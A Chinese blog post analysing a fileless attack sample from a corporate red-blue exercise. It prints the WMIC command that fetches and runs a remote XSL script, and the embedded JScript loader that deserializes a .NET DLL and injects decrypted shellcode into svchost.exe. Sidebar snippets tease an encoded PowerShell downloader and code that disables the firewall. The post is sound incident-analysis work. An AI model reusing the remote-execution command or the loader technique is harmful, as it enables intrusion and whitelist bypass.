一次红蓝对抗无文件攻击溯源

最新推荐文章于 2023-03-19 11:55:39 发布
最新推荐文章于 2023-03-19 11:55:39 发布
阅读量2.9k 收藏 12
点赞数
分类专栏: 心情杂货铺 文章标签: xsl利用 无文件攻击 红蓝对抗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cssxn/article/details/88956732
版权

0)简述

前段时间参加公司举办的红蓝对抗演习,帮助蓝军分析并溯源样本。

拿到样本时,就一个xsl类型的文件,和一个用来执行该样本的命令行,如下所示:

C:/Windows/SysWOW64/wbem/WMIC.exe os get /format:"//ip/scripts/1.xsl"

可以看出,是通过白利用技术,通过wmic来执行的这个恶意的xsl文件,想了解更多,可以参考这篇文章《wmic调用xsl文件的分析与利用

1)xsl文件分析

XSL文件是一种可扩展样式语言,维基百科的解释,可以通过内置标签来解析执行其他脚本语言,如:Javascript,VBscript等。

通过分析发现,该xsl中内嵌的远不止JS脚本这么简单!内嵌的js脚本会修改当前进程的shell环境为.net的环境,然后通过解密base64硬编码的PE文件,该文件是由C#编写的DLL文件。

然后以.NET的shell环境来调用.net的函数,并把硬编码的dll文件字节码反序列化成C#类对象,调用该类对象中的名为:call的函数

通过js调用.net函数,参考: https://github.com/tyranid/DotNetToJScript

修改Shell环境为.NET:

function autoversion()
    {
        var shell = new ActiveXObject('WScript.Shell');
        ver = 'v4.0.30319';
        try {
        shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\');
        } catch(e) {
        ver = 'v2.0.50727';
        }
        shell.Environment('Process')('COMPLUS_Version') = ver;
    }

调用.net类对象的call函数,可以看到call函数传入一个系统进程名字,svchost.exe,另一个是base64硬编码的一段加密的code

run函数:

function run()
    {
        var serialized_obj = 'base64硬编码的C# DLL文件';
        var cryptedcode = 'Base64加密的shellcode';
        var entry_class = 'test';
 
        try
        {
            autoversion();
            var stm = base64ToStream(serialized_obj);
            var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
            var al = new ActiveXObject('System.Collections.ArrayList');
            var d = fmt.Deserialize_2(stm);
            al.Add(fmt.SurrogateSelector);
            var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
            o.call('svchost.exe', cryptedcode);
        }
        catch (e)
        {
        }
 
        return 0;
    }

serialized_obj变量中保存的是base64硬编码的dll文件,首先通过Chrome浏览器自带的调试器,还原出完整的base64加密字符串,点击右下角的copy

在这里插入图片描述

然后使用010Editor自带的base64decode脚本解密该密文
在这里插入图片描述
解密base64后,切换个hex模式,往下拉动滚动条,可以看到文件的MZ头,删除前面的垃圾内容,保留从MZ头到末尾即可还原出DLL文件

在这里插入图片描述
可以看到是.net2.0库写的dll
在这里插入图片描述
2)C# DLL文件分析

使用ILSpy工具反编译刚才dump出来的C# DLL文件,可以看到内部有个test类,类中果然有个call的方法
在这里插入图片描述
call(svchost,base64密文),Call方法中调用 DESEncrypt.Decrypt(b64code, test.key);方法,解密base64密文,然后使用硬编码的DES KEY:***ATeam 解密shellcode
在这里插入图片描述
最后调用CodeLoader.CreateProcessWithCode(path, code); 通过分析CreateProcessWithCode函数,发现是通过创建傀儡进程的方式注入shellcode并运行的,了解更多,请参考《傀儡进程的创建于检测
在这里插入图片描述

3)shellcode分析

通过上面的分析,可以写一个C#程序,把注入到进程中的shellcode dump出来

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
 
namespace test
{
    class Program
    {
        static string key = "xxx";
        static string cryptedcode = "base64->des加密的shellcode";
 
        public static byte[] Decrypt(string pToDecrypt, string sKey)
        {
            DESCryptoServiceProvider dESCryptoServiceProvider = new DESCryptoServiceProvider();
            byte[] array = Convert.FromBase64String(pToDecrypt);
            dESCryptoServiceProvider.Key = Encoding.ASCII.GetBytes(sKey);
            dESCryptoServiceProvider.IV = Encoding.ASCII.GetBytes(sKey);
            MemoryStream memoryStream = new MemoryStream();
            CryptoStream cryptoStream = new CryptoStream(memoryStream, dESCryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Write);
            cryptoStream.Write(array, 0, array.Length);
            cryptoStream.FlushFinalBlock();
            return memoryStream.ToArray();
        }
 
        static void Main(string[] args)
        {
 
           byte[] code =  Decrypt(cryptedcode, key);
           string filePath = Directory.GetCurrentDirectory() + "\\123.txt";
           if (File.Exists(filePath))
               File.Delete(filePath);
 
           FileStream fs = new FileStream(filePath, FileMode.Create);
           fs.Write(code, 0, code.Length);
           fs.Flush();
           fs.Close();
 
             
           int n = 123;
        }
    }
}

分析shellcode后,发现是个loader程序,对应的C2地址,由于这边IP访问限制,访问不了总部那边的网络

在这里插入图片描述

FFE4
关注
  • 0
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
20201126-Insec-对抗中的溯源反制实战-深交所-郭威.pdf
11-05
作者-深交所-郭威
初窥WMI
|独自望海。。。
09-27 743
Microsoft Windows Management Instrumentation (WMI)。中文名字叫Windows管理规范。从Windows 2000开始,WMI(Windows 管理规范)就内置于操作系统中,并且成为了Windows系统管理的重要组成部分。所以大家很容易就能见到它的,因为我们至少也应该是个Windows 2000的使用者了。下面我将详细介绍它的每个细节,让你从不
使用wmic.exe绕过应用程序白名单(多种方法)
weixin_30764137的博客
03-07 1224
一、Wmic.exe wmic实用程序是一款Microsoft工具,它提供一个wmi命令行界面,用于本地和远程计算机的各种管理功能,以及wmic查询,例如系统设置、停止进程和本地或远程运行脚本。因此,它可以调用XSL脚本来执行。 二、攻击方法 1.第一种方法:Koadic 我们将在Koadic的帮助下生成一个恶意的XSL文件,它是一个命令和控制工具,与Metasploit和Power...
对抗专题资料.zip
04-21
网络空间资产测绘;资产暴露面及突破链预测; 网络攻击的干扰压制与溯源;下一代欺骗防御解决方案; 大杀器的检测与止血策略;如何赢得对抗; 攻防实战演习方案;防守阵地的有效建设等
eventstore-js:用 JavaScript 完成的事件溯源
06-11
事件存储.js 事件溯源在 JavaScript 中完成。 我们将看到,我们可以在这方面走多远,以及它的真正用途。 当心:这几乎是正在进行和评估的工作。 安装 如果使用 PostgreSQL 适配器,请创建一个数据库并在 psql 控制台中运行db-migration/postgres.sql的内容。 它将为您创建所需的数据库结构。 内存存储对于测试很有用。
《入侵生命周期细分实践指南系列》:XSL脚本攻击
美创科技的博客
05-20 315
美创科技为了更好地进行入侵检测和防御,参照各种安全威胁框架和自身的实践与思考,提出了基于入侵生命周期的攻击管理模型,作为美创新一代安全架构的三大支柱之一。 入侵生命周期v1.0把入侵过程划分为7个阶段:探索发现、入侵和感染、探索感知、传播、持久化、攻击和利用、恢复。入侵生命周期v1.0同样以ATT&CK作为基本战x术x知识库,匹配到不同的入侵阶段。需要注意的是,并非所有的入侵都会经历这7个阶段,也没有绝对的线性次序。 1)探索发现 在这个阶段中,攻击者会先锁定攻击对象,然后利用某些技术手段,尽
javascript原型链追根溯源
忘云的专栏
03-05 742
写在前面上篇文章详细解释了一下prototype与__proto__两个属性的差异与联系。这里涉及到原型链的概念,所以我就又生出了疑问,javascript中既然所有东西都是对象,而他们又是相互继承的关系,子又生孙,孙又生子,无穷匮也,那他们的源头又在哪里,换句话说,他们共同的祖先在哪里。所以,这回我通过对Function与Object两个对象的实验,试图弄清这个事儿。两个老祖先:Function.
工作中对溯源反制有帮助的两个小脚本
qq_53058639的博客
03-19 263
介绍两个小脚本,在溯源的工作中,使用频繁,根据客户的需求来,我在项目上客户要求,不管啥IP,只要有攻击行为就开始溯源。一下子工作量就上来了,每天都拿到大量的IP,项目快结束的时候,直接过来了全部的IP。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。如果IP很少的话,就最后一天导入GOBY,进行批量扫描,找到web服务,或者其他的一些漏洞,你别不信,做安全的机子上还有漏洞?
溯源JavaScript
heycn112的博客
10-14 148
本篇博客是作为个人自学记录,如有不足之处,请批评指正。 李爵士发明HTML 赖先生发明CSS 布兰登发明JS 布兰登和他的JavaScript TL;DR: 布兰登,美国人,1995年进入网景公司,网景公司要求布兰登尽快创造出一种性语言(看上去与Java相似,但是比Java简单),但布兰登对Java并不感兴趣,为了应付任务,仅花10天就设计出JavaScript,当时这个语言有很多bug,但谁知道现在这么火呢? 布兰登 1961 年出生于美国,物理学转数学与计算机学位 七年工作中,他.
vbs调用c++dll_利用wmic调用xsl文件的分析与利用以及细节的答疑
weixin_39821605的博客
12-06 234
Casey Smith@subTee在博客分享的一个技巧,使用wmic能够从本地或从URL调用XSL(可扩展样式表语言)脚本。这个发现很有用,不仅可以作为一种白名单绕过的方法,而且可以作为payload来使用(从URL调用XSL脚本,利用XSL执行exe、shellcode、powershell脚本)。本地简单的一个wmic.xsl文件内容如下:远程执行命令:wmic os get /FORMAT...
对抗中的溯源反制实战.pdf
03-12
对抗中的溯源反制实战.pdf
对抗——队手册.pdf
04-15
web安全的关注点会不同于渗透测试的团队,例如团队就会关注一些敏感文件泄漏、管理后台暴露、waf有效性、waf防御效果、违规使用的框架等。再例如办公网安全团队还会关注安全助手的一些问题,也就是说团队关注的不仅是应用服务的漏洞,各个安全组件的效果、漏洞都会关注到。 上面都是按照一个个大项来进行,其实还有的团队是按项目来分,比如说xx支付业务对抗,给你域名或者ip,让你自由发挥,不限方法拿到目标flag(例如xx支付的数据或者机器权限等),这个过程不要求测的全,以结果为导向。然后队(防御方)尽可能复盘补漏,把不完善的地方都补齐。后面可以继续进行对抗演练,继续找出薄弱点,这边很考验队的技术和业务的了解程度,能从队的攻击链路中,找出尽可能多的脆弱点,做出防御策略。所以,我觉得对抗还是得根据公司的规模、安全人员的比例、技术人员的素养做制定,都按同一套标准是不会适用所有公司的。 懂的人自然懂。:)
谈谈WEB领域的对抗.pdf
07-30
谈谈WEB领域的对抗 7月30日 山石网科线上沙龙 hcon 演讲PPT
对抗的思考.pdf
02-25
2020年日安全星火沙龙PPT对抗的思考.pdf
Python修改文件往指定行插入内容
热门推荐
Sven的忘却日记
07-11 1万+
需求:批量修改py脚本中的类属性,为类增加一个core = True新的属性 a.py class A(): description = "abc" 现在有一个1.txt文本,保存着需要修改的py文件中含有的description属性。 1.txt description = "abc" description = "123" 实现思
使用注册表关闭Windows防火墙
Sven的忘却日记
06-11 6546
#include "stdafx.h" #include <windows.h> int _tmain(int argc, _TCHAR* argv[]) { HKEY hKey = nullptr; LONG lRet = NULL; char* szSubkey = "SYSTEM\\CurrentControlSet\\services\\Shared...
还原永恒之下载器PS脚本混淆
Sven的忘却日记
04-26 5621
注意:以下代码为真实永恒之木马下载器恶意ps代码,请不要在真实机运行、测试以及调试!!! 下面代码取自了该病毒设置的计划任务 powershell.exe -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAG...
SouceInsight v4 注册机源码
Sven的忘却日记
09-22 4360
下面c++代码可以用来生成Source Insight v4.0的注册码,网络验证还需要各位自己去patch一下!~ #include "stdafx.h" #include <windows.h> int main() { byte serial_table[] = { 0x4b, 0x56, 0x39, 0x36, 0x47, 0x4d, 0x4a, 0x59, 0x48, ...
读取QQ ClientKey C++版本
Sven的忘却日记
01-02 3977
不需要注入,读取QQ ClientKey C++版本 #include "stdafx.h" #include<string> #include<windows.h> #include<iostream> #include <WinInet.h> #pragma comment(lib,"wininet.lib") using namespace s...
请绘制安全攻击溯源的思维导图
最新发布
03-26
很抱歉,我只是一个语言模型AI,无法提供图像输出。但可以为您提供思路指导: 一、攻击溯源的原则及概念 1.攻击溯源的主要原则是收集、分析、整合、推测和验证相关信息,以确定攻击来源、方式、目的和影响。 2.攻击溯源的概念是指在网络和信息安全领域中,通过收集、分析和处理有关攻击事件所产生的数据和信息,追溯和确认攻击事件的信息源头、评估其操作行为和目的,进而确定合理的防御和安全策略。 二、攻击溯源的基本步骤 1.数据收集:通过网络设备、日志收集工具或其他渠道获取与攻击事件相关的数据和信息,包括攻击方式、来源、时间、目标等。 2.数据清理:对收集到的数据进行清洗、筛选,剔除噪音数据和不必要的信息,保留有价值的信息。 3.数据分析:对清洗过的数据进行深入分析,从中提取关键信息并进行归纳、总结、分类和梳理。 4.数据推测:利用数据和信息推测攻击者的意图和行为模式,探测攻击行为的特征、规律和趋势。 5.数据验证:通过比对、回溯、模拟等手段进行数据和信息的验证,保证分析得到的结论和推论是正确合理的。 三、攻击溯源的关键技能和方法 1.网络安全基础知识:掌握网络和信息安全基本理论、技术和方法,了解攻击方式和攻击手段,具有较强的技术储备和安全观念。 2.数据采集和分析技能:熟练掌握网络安全日志分析工具、数据挖掘工具、分析工具等,具备数据采集、处理、分析和挖掘的能力。 3.攻击溯源方法:根据攻击事件的特征和情况,灵活运用防御和溯源技术,包括主机取证、网络取证、行为分析、威胁情报、漏洞挖掘等。 4.交叉学科技能:攻击溯源涉及到多个领域的知识,如计算机科学、网络工程、数据科学、犯罪心理学等,需要具备跨领域交叉学科知识的掌握和应用能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值